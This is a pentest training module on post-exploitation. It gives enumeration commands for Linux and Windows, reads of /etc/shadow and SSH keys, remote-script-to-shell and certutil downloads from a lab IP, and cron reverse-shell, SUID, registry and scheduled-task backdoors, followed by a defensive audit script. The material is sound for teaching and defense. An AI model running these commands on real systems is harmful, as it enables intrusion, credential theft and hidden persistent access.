Post-Exploitation Fundamentals

Intermediate · 30 min · Writeup

What to do after gaining initial access

Learning Objectives

  • Establish persistence
  • Gather system information
  • Find sensitive data
  • Identify lateral movement paths

You got a shell - now what? Post-exploitation is everything that happens after initial access. This includes enumeration, privilege escalation, persistence, lateral movement, and achieving your objectives.

Getting initial access is just the beginning. The real work starts in post-exploitation - understanding the environment, escalating privileges, and moving through the network.

Situational Awareness

bash
# Who am I?
whoami
id
groups

# Where am I?
hostname
pwd
uname -a

# What system is this?
cat /etc/os-release
cat /etc/issue
lsb_release -a

# Who else is here?
who
w
last

# What can I run?
sudo -l

# Network info
ip a
ifconfig
route
netstat -tulpn
ss -tulpn

# What processes are running?
ps aux
ps aux | grep root

Linux Enumeration

bash
# Find sensitive files
find / -name "*.txt" 2>/dev/null
find / -name "*.conf" 2>/dev/null
find / -name "id_rsa" 2>/dev/null
find / -name ".bash_history" 2>/dev/null

# Check for SUID binaries
find / -perm -4000 2>/dev/null

# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*/
crontab -l

# Check sudo
sudo -l
cat /etc/sudoers 2>/dev/null

# Interesting files
cat /etc/passwd
cat /etc/shadow 2>/dev/null
cat ~/.bash_history
cat ~/.ssh/id_rsa 2>/dev/null

# Automated enumeration
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

Windows Enumeration

batch
REM Who am I?
whoami
whoami /priv
whoami /groups

REM System info
hostname
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

REM Network
ipconfig /all
netstat -ano
route print

REM Users
net users
net localgroup administrators

REM Running services
tasklist /SVC
wmic service get name,displayname,pathname,startmode

REM Scheduled tasks
schtasks /query /fo LIST /v

REM Check for stored credentials
cmdkey /list

REM Automated enumeration
.\winPEAS.exe
.\PowerUp.ps1

File Transfers

bash
# Linux - Download files

# Python HTTP server (on your machine)
python3 -m http.server 80

# wget (on target)
wget http://10.10.14.5/linpeas.sh

# curl
curl http://10.10.14.5/linpeas.sh -o linpeas.sh

# Netcat
nc -lvnp 4444 < file.txt   # Sender
nc 10.10.10.10 4444 > file.txt   # Receiver

# Windows - Download files

# PowerShell
Invoke-WebRequest -Uri http://10.10.14.5/winpeas.exe -OutFile winpeas.exe
(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/nc.exe','nc.exe')

# Certutil
certutil -urlcache -split -f http://10.10.14.5/shell.exe shell.exe

# SMB (impacket on your machine)
impacket-smbserver share $(pwd) -smb2support
# On Windows:
copy \\10.10.14.5\share\file.exe .

Basic Persistence

bash
# SSH key backdoor
# Generate on attacker:
ssh-keygen -t rsa
# Add to target:
echo "your_public_key" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

# Cron backdoor (Linux)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'" | crontab -

# SUID backdoor (as root)
cp /bin/bash /tmp/.backdoor
chmod u+s /tmp/.backdoor
# To use: /tmp/.backdoor -p

# Windows - Scheduled task
schtasks /create /sc minute /mo 1 /tn "Backup" /tr "C:\shell.exe"

# Windows - Registry run key
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\shell.exe"

Persistence should only be used in authorized engagements. Always document what you add and clean up after yourself!
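As an added example (not part of the original writeup), a small shell audit that looks for the three Linux persistence artifacts shown above: reverse-shell cron entries, SSH keys that are not in a known-good baseline, and SUID files in a scratch directory. It serves both as the post-engagement cleanup check the note above asks for and as a defender's detection pass; the baseline file of known-good keys and all paths are assumptions passed in as parameters.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup: audit a Linux host for the
# three persistence artifacts described above. File paths are parameters so
# the checks can be exercised on constructed sample files as well as live.

# Print crontab lines (prefixed with their line number) that spawn an
# interactive shell over /dev/tcp or netcat; commented-out lines are skipped.
# Usage: suspicious_cron_lines <crontab-file>
suspicious_cron_lines() {
    grep -nE '/dev/tcp/|[[:space:]](nc|ncat)[[:space:]]|bash -i' "$1" \
        | grep -vE '^[0-9]+:[[:space:]]*#' || true
}

# Print keys in an authorized_keys file that are absent from a baseline file
# of known-good keys. Only key type and key body are compared, so a changed
# comment field can neither hide an extra key nor cause a false alarm.
# Usage: unexpected_keys <authorized_keys-file> <baseline-file>
unexpected_keys() {
    known=$(mktemp)
    LC_ALL=C awk 'NF >= 2 {print $1, $2}' "$2" | LC_ALL=C sort -u > "$known"
    LC_ALL=C awk 'NF >= 2 {print $1, $2}' "$1" | LC_ALL=C sort -u \
        | LC_ALL=C comm -23 - "$known"
    rm -f "$known"
}

# List set-uid regular files under a directory; pointed at /tmp or another
# world-writable path this catches the SUID copy of bash shown above.
# Usage: suid_in_dir <dir>
suid_in_dir() {
    find "$1" -type f -perm -4000 2>/dev/null | LC_ALL=C sort
}

# Stand-alone run against the live host: ./audit.sh --live [baseline-keys]
if [ "${1:-}" = "--live" ]; then
    echo "== cron entries spawning shells =="
    [ -r /etc/crontab ] && suspicious_cron_lines /etc/crontab
    echo "== authorized_keys entries not in baseline =="
    [ -r "$HOME/.ssh/authorized_keys" ] \
        && unexpected_keys "$HOME/.ssh/authorized_keys" "${2:-/dev/null}"
    echo "== SUID files under /tmp =="
    suid_in_dir /tmp
fi
```

Without `--live` the file only defines the functions, so it can be sourced into an existing cleanup or monitoring script.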

Knowledge Check

Quick Quiz
Question 1 of 1

What is the first thing to do after getting a shell?

Key Takeaways

  • First: situational awareness - who, where, what system
  • Enumerate systematically - users, processes, network, files
  • Know multiple file transfer methods - some will be blocked
  • Document everything for your report
  • Persistence requires cleanup - always remove your artifacts